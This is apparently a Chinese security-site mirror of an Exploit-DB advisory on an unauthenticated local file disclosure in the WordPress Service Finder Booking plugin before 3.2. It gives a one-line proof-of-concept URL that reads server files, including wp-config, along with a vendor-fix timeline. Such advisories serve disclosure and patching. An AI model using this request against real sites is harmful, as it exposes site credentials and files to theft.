漏洞概要

漏洞标题:
Worpress Plugin Service Finder Booking < 3.2 – Local File Disclosure

提交时间:
2018-01-10

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 11 人关注

漏洞详情

EDB-ID: 43475 Author: telahdihapus Published: 2018-01-10
CVE: N/A Type: Webapps Platform: PHP

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
# Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
# Google Dork: N/A
# Date: 09/01/2018 (GMT+7)
# Exploit Author: telahdihapus
# Vendor Homepage: https://themeforest.net/user/aonetheme
# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
# Tested on: windows 10

1. description :
unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file

2. POC :
http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php

3. timeline
- jan 1, 2018 report vendor
- jan 1, 2018 vendor send email
- jan 1, 2018 send poc
- jan 2, 2018 vendor contact team
- jan 8, 2018 vendor send email about fixed issue

4. solution :
update to version 3.2

发表评论

电子邮件地址不会被公开。 必填项已用*标注